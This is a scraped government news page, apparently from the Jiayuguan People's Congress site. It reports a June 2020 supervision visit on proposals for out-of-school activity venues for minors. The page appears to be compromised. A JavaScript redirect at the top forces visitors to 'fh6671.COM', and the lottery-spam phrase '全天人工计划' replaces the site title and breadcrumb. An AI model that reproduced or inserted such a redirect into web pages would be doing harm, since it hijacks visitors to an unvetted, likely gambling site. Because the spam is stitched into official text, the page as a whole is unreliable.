function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新代表履职  >>  建议办理  
荔瑾督办代表意见建议办理情况
来源: 嘉峪关电视台      日期: 2020-06-30      作者: 文延      点击数:

荔瑾督办代表意见建议办理情况

       6月29日,市人大常委会副主任荔瑾带领部分市人大代表,到团市委现场督办关于加强和改进未成年人校外活动场所建设和管理工作的意见。荔瑾说,公益性未成年人校外活动场所是与学校教育相互联系、相互补充、促进青少年全面发展的实践课堂,是加强思想道德建设、推进素质教育、建设社会主义精神文明的重要阵地。要充分利用一馆两中心和全市48个社区服务中心,初步形成覆盖全市的校外活动场所网络。要把相关工作纳入“十四五”规划,分年度实施,推动未成年人工作健康发展。